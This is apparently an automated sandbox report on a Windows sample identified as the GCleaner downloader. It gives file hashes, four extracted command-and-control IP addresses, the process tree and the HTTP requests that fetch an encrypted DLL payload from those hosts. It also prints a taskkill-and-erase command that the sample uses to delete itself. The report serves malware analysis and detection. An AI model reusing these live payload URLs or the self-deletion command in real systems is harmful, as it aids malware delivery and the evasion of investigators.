Analysis
-
max time kernel
135s -
max time network
154s -
platform
windows10-2004_x64 -
resource
win10v2004-20230220-en -
resource tags
arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system -
submitted
19/05/2023, 09:53 UTC
Static task
static1
Behavioral task
behavioral1
Sample
file.exe
Resource
win7-20230220-en
General
-
Target
file.exe
-
Size
1.9MB
-
MD5
21321336c670d1b96295499d7697c105
-
SHA1
9ceaf33034147557c938e4f658ee2a054260c507
-
SHA256
28298b9302a467ad92b509e1a961e5d98a5179f9cec7cebd1cfe50e844506a77
-
SHA512
06a06558673b0cc435f50ca7c4d9e82d6a096f5b40b38967b9d785eab7d63f2c320b80c71456c41bc19b327d65cfd61cadce5b75a4b2684ccd5c9979aa08cf98
-
SSDEEP
49152:KiJ6hloLsJLD7cAKYQ0E7OtjjgfKs8wuV:KiQhyLsJn79vAOtjGFI
Malware Config
Extracted
gcleaner
45.12.253.56
45.12.253.72
45.12.253.98
45.12.253.75
Signatures
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-144354903-2550862337-1367551827-1000\Control Panel\International\Geo\Nation Rec519.exe -
Executes dropped EXE 3 IoCs
pid Process 960 is-GMT7H.tmp 3284 Rec519.exe 4064 zoeaAOcg5yQ.exe -
Loads dropped DLL 1 IoCs
pid Process 960 is-GMT7H.tmp -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops file in Program Files directory 9 IoCs
description ioc Process File created C:\Program Files (x86)\FLJCover\Rec519\is-KNK3A.tmp is-GMT7H.tmp File created C:\Program Files (x86)\FLJCover\Rec519\is-9PJE0.tmp is-GMT7H.tmp File created C:\Program Files (x86)\FLJCover\Rec519\is-C9MR2.tmp is-GMT7H.tmp File opened for modification C:\Program Files (x86)\FLJCover\Rec519\Rec519.exe is-GMT7H.tmp File created C:\Program Files (x86)\FLJCover\Rec519\unins000.dat is-GMT7H.tmp File created C:\Program Files (x86)\FLJCover\Rec519\is-0V01K.tmp is-GMT7H.tmp File created C:\Program Files (x86)\FLJCover\Rec519\is-TD7EI.tmp is-GMT7H.tmp File created C:\Program Files (x86)\FLJCover\Rec519\data\is-40RLA.tmp is-GMT7H.tmp File opened for modification C:\Program Files (x86)\FLJCover\Rec519\unins000.dat is-GMT7H.tmp -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Kills process with taskkill 1 IoCs
pid Process 4816 taskkill.exe -
Suspicious behavior: EnumeratesProcesses 6 IoCs
pid Process 3284 Rec519.exe 3284 Rec519.exe 3284 Rec519.exe 3284 Rec519.exe 3284 Rec519.exe 3284 Rec519.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 4816 taskkill.exe -
Suspicious use of WriteProcessMemory 15 IoCs
description pid Process procid_target PID 948 wrote to memory of 960 948 file.exe 84 PID 948 wrote to memory of 960 948 file.exe 84 PID 948 wrote to memory of 960 948 file.exe 84 PID 960 wrote to memory of 3284 960 is-GMT7H.tmp 85 PID 960 wrote to memory of 3284 960 is-GMT7H.tmp 85 PID 960 wrote to memory of 3284 960 is-GMT7H.tmp 85 PID 3284 wrote to memory of 4064 3284 Rec519.exe 86 PID 3284 wrote to memory of 4064 3284 Rec519.exe 86 PID 3284 wrote to memory of 4064 3284 Rec519.exe 86 PID 3284 wrote to memory of 4484 3284 Rec519.exe 94 PID 3284 wrote to memory of 4484 3284 Rec519.exe 94 PID 3284 wrote to memory of 4484 3284 Rec519.exe 94 PID 4484 wrote to memory of 4816 4484 cmd.exe 96 PID 4484 wrote to memory of 4816 4484 cmd.exe 96 PID 4484 wrote to memory of 4816 4484 cmd.exe 96
Processes
-
C:\Users\Admin\AppData\Local\Temp\file.exe"C:\Users\Admin\AppData\Local\Temp\file.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:948 -
C:\Users\Admin\AppData\Local\Temp\is-57L9K.tmp\is-GMT7H.tmp"C:\Users\Admin\AppData\Local\Temp\is-57L9K.tmp\is-GMT7H.tmp" /SL4 $B006C "C:\Users\Admin\AppData\Local\Temp\file.exe" 1791781 522242⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:960 -
C:\Program Files (x86)\FLJCover\Rec519\Rec519.exe"C:\Program Files (x86)\FLJCover\Rec519\Rec519.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3284 -
C:\Users\Admin\AppData\Roaming\{88209788-b19c-11ed-8ff5-806e6f6e6963}\zoeaAOcg5yQ.exe
- Executes dropped EXE
PID:4064
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "Rec519.exe" /f & erase "C:\Program Files (x86)\FLJCover\Rec519\Rec519.exe" & exit4⤵
- Suspicious use of WriteProcessMemory
PID:4484 -
C:\Windows\SysWOW64\taskkill.exetaskkill /im "Rec519.exe" /f5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4816
-
-
-
-
Network
-
Remote address:8.8.8.8:53Request228.249.119.40.in-addr.arpaIN PTRResponse
-
Remote address:45.12.253.56:80RequestGET /advertisting/plus.php?s=NOSUB&str=mixtwo&substr=mixinte HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
User-Agent: OK
Host: 45.12.253.56
Connection: Keep-Alive
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 1
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
-
Remote address:45.12.253.72:80RequestGET /default/stuk.php HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
User-Agent: OK
Host: 45.12.253.72
Connection: Keep-Alive
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 21
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
-
Remote address:45.12.253.72:80RequestGET /default/puk.php HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
User-Agent: OK
Host: 45.12.253.72
Connection: Keep-Alive
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.41 (Ubuntu)
Pragma: public
Expires: 0
Cache-Control: must-revalidate, post-check=0, pre-check=0
Cache-Control: private
Content-Disposition: attachment; filename="fuckingdllENCR.dll";
Content-Transfer-Encoding: binary
Content-Length: 95248
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: application/octet-stream
-
Remote address:45.12.253.75:80RequestGET /dll.php HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
User-Agent: B
Host: 45.12.253.75
Connection: Keep-Alive
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 1
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
-
Remote address:45.12.253.75:80RequestGET /dll.php HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
User-Agent: B
Host: 45.12.253.75
Connection: Keep-Alive
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 1
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
-
Remote address:45.12.253.75:80RequestGET /dll.php HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
User-Agent: B
Host: 45.12.253.75
Connection: Keep-Alive
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 1
Keep-Alive: timeout=5, max=98
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
-
Remote address:45.12.253.75:80RequestGET /dll.php HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
User-Agent: B
Host: 45.12.253.75
Connection: Keep-Alive
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 1
Keep-Alive: timeout=5, max=97
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
-
Remote address:45.12.253.75:80RequestGET /dll.php HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
User-Agent: B
Host: 45.12.253.75
Connection: Keep-Alive
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 1
Keep-Alive: timeout=5, max=96
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
-
Remote address:45.12.253.75:80RequestGET /dll.php HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
User-Agent: B
Host: 45.12.253.75
Connection: Keep-Alive
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 1
Keep-Alive: timeout=5, max=95
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
-
Remote address:45.12.253.75:80RequestGET /dll.php HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
User-Agent: B
Host: 45.12.253.75
Connection: Keep-Alive
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 1
Keep-Alive: timeout=5, max=94
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
-
Remote address:45.12.253.75:80RequestGET /dll.php HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
User-Agent: B
Host: 45.12.253.75
Connection: Keep-Alive
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 1
Keep-Alive: timeout=5, max=93
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
-
Remote address:45.12.253.75:80RequestGET /dll.php HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
User-Agent: B
Host: 45.12.253.75
Connection: Keep-Alive
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 1
Keep-Alive: timeout=5, max=92
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
-
Remote address:45.12.253.75:80RequestGET /dll.php HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
User-Agent: B
Host: 45.12.253.75
Connection: Keep-Alive
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 1
Keep-Alive: timeout=5, max=91
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
-
Remote address:45.12.253.75:80RequestGET /dll.php HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
User-Agent: B
Host: 45.12.253.75
Connection: Keep-Alive
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 1
Keep-Alive: timeout=5, max=90
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
-
Remote address:8.8.8.8:53Request56.253.12.45.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request72.253.12.45.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request75.253.12.45.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request209.205.72.20.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request13.86.106.20.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request217.106.137.52.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request64.13.109.52.in-addr.arpaIN PTRResponse
-
322 B 7
-
45.12.253.56:80http://45.12.253.56/advertisting/plus.php?s=NOSUB&str=mixtwo&substr=mixintehttpRec519.exe712 B 376 B 6 4
HTTP Request
GET http://45.12.253.56/advertisting/plus.php?s=NOSUB&str=mixtwo&substr=mixinteHTTP Response
200 -
4.4kB 98.9kB 78 76
HTTP Request
GET http://45.12.253.72/default/stuk.phpHTTP Response
200HTTP Request
GET http://45.12.253.72/default/puk.phpHTTP Response
200 -
5.3kB 3.2kB 25 23
HTTP Request
GET http://45.12.253.75/dll.phpHTTP Response
200HTTP Request
GET http://45.12.253.75/dll.phpHTTP Response
200HTTP Request
GET http://45.12.253.75/dll.phpHTTP Response
200HTTP Request
GET http://45.12.253.75/dll.phpHTTP Response
200HTTP Request
GET http://45.12.253.75/dll.phpHTTP Response
200HTTP Request
GET http://45.12.253.75/dll.phpHTTP Response
200HTTP Request
GET http://45.12.253.75/dll.phpHTTP Response
200HTTP Request
GET http://45.12.253.75/dll.phpHTTP Response
200HTTP Request
GET http://45.12.253.75/dll.phpHTTP Response
200HTTP Request
GET http://45.12.253.75/dll.phpHTTP Response
200HTTP Request
GET http://45.12.253.75/dll.phpHTTP Response
200 -
260 B 5
-
322 B 7
-
322 B 7
-
322 B 7
-
322 B 7
-
260 B 5
-
322 B 7
-
260 B 5
-
260 B 5
-
260 B 5
-
260 B 5
-
73 B 159 B 1 1
DNS Request
228.249.119.40.in-addr.arpa
-
71 B 146 B 1 1
DNS Request
56.253.12.45.in-addr.arpa
-
71 B 146 B 1 1
DNS Request
72.253.12.45.in-addr.arpa
-
71 B 146 B 1 1
DNS Request
75.253.12.45.in-addr.arpa
-
72 B 158 B 1 1
DNS Request
209.205.72.20.in-addr.arpa
-
71 B 157 B 1 1
DNS Request
13.86.106.20.in-addr.arpa
-
73 B 147 B 1 1
DNS Request
217.106.137.52.in-addr.arpa
-
71 B 145 B 1 1
DNS Request
64.13.109.52.in-addr.arpa
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2.3MB
MD5c0eae78c99309d24d1c1714eae8d49a2
SHA191f99afc80063423527634e15872c1917e4056ec
SHA256089a52e8a82b267e32784686390d5a26878608283d8e6da067fc91abb4f85180
SHA5124a97870169c0ce9a2b0aa0ce51fe6c9025f2432236e69437b579a9c7263c76f69f88af16b426e3a4225c4ee5871be45d6244327dadb777e56896472a3e1b8aa4
-
Filesize
2.3MB
MD5c0eae78c99309d24d1c1714eae8d49a2
SHA191f99afc80063423527634e15872c1917e4056ec
SHA256089a52e8a82b267e32784686390d5a26878608283d8e6da067fc91abb4f85180
SHA5124a97870169c0ce9a2b0aa0ce51fe6c9025f2432236e69437b579a9c7263c76f69f88af16b426e3a4225c4ee5871be45d6244327dadb777e56896472a3e1b8aa4
-
Filesize
1B
MD5cfcd208495d565ef66e7dff9f98764da
SHA1b6589fc6ab0dc82cf12099d1c2d40ab994e8410c
SHA2565feceb66ffc86f38d952786c6d696c79c2dbc239dd4e91b46729d73a27fb57e9
SHA51231bca02094eb78126a517b206a88c73cfa9ec6f704c7030d18212cace820f025f00bf0ea68dbf3f3a5436ca63b53bf7bf80ad8d5de7d8359d0b7fed9dbc3ab99
-
Filesize
644KB
MD51f2bc482c99f55a713cf6ca3c1ff04f8
SHA1852bacef61b885aa31afc7f615de6c6af0f715f4
SHA2560a0d0b1916549cf997e2110a768d5bd088f5d1390960c22cb9609fe722779dcf
SHA512a0ece5740fadbdb08f8a9efdb5e72b56198cfb35981835e03dafd2ad09d61bc592e602887d7cf65c58fc19b26caea653c1b5e5d4f35a85ebdc784300aa6948e9
-
Filesize
644KB
MD51f2bc482c99f55a713cf6ca3c1ff04f8
SHA1852bacef61b885aa31afc7f615de6c6af0f715f4
SHA2560a0d0b1916549cf997e2110a768d5bd088f5d1390960c22cb9609fe722779dcf
SHA512a0ece5740fadbdb08f8a9efdb5e72b56198cfb35981835e03dafd2ad09d61bc592e602887d7cf65c58fc19b26caea653c1b5e5d4f35a85ebdc784300aa6948e9
-
Filesize
2KB
MD5a69559718ab506675e907fe49deb71e9
SHA1bc8f404ffdb1960b50c12ff9413c893b56f2e36f
SHA2562f6294f9aa09f59a574b5dcd33be54e16b39377984f3d5658cda44950fa0f8fc
SHA512e52e0aa7fe3f79e36330c455d944653d449ba05b2f9abee0914a0910c3452cfa679a40441f9ac696b3ccf9445cbb85095747e86153402fc362bb30ac08249a63
-
Filesize
72KB
MD53fb36cb0b7172e5298d2992d42984d06
SHA1439827777df4a337cbb9fa4a4640d0d3fa1738b7
SHA25627ae813ceff8aa56e9fa68c8e50bb1c6c4a01636015eac4bd8bf444afb7020d6
SHA5126b39cb32d77200209a25080ac92bc71b1f468e2946b651023793f3585ee6034adc70924dbd751cf4a51b5e71377854f1ab43c2dd287d4837e7b544ff886f470c
-
Filesize
72KB
MD53fb36cb0b7172e5298d2992d42984d06
SHA1439827777df4a337cbb9fa4a4640d0d3fa1738b7
SHA25627ae813ceff8aa56e9fa68c8e50bb1c6c4a01636015eac4bd8bf444afb7020d6
SHA5126b39cb32d77200209a25080ac92bc71b1f468e2946b651023793f3585ee6034adc70924dbd751cf4a51b5e71377854f1ab43c2dd287d4837e7b544ff886f470c